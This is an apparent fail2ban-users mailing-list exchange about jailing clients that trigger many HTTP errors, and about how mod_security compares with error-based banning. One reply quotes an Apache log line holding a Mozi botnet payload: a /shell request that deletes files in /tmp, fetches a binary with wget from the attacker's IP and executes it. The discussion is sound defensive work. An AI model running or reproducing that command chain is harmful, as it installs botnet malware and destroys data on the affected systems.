Hi Peter,
thaks for your E-Mail.
OK. A typo also may cause an error code.
But what is if i make a jail for someone which causes 5 or ten error codes in
let's say a minute or two ?
Fail2ban should be able to do this.
5 or ten error codes with a typo ... not so likely.
Bernd
Try it.
However, if
[12/Apr/2021:07:43:59 +0200] [austria136.server4you.de:80] [client
111.170.84.245] - - "GET
/shell?cd+/tmp;rm+-rf+*;wget+http://111.170.84.245:53394/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
HTTP/1.1" 404 486 "-" "Hello, world"
such a security hole works, you have already lost, before apache knows
about a 4xx errorcode. mod_security prevents from this scenario.
If you only try to make life to hackers harder, it should work i think.
Peter
_______________________________________________
Fail2ban-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/fail2ban-users
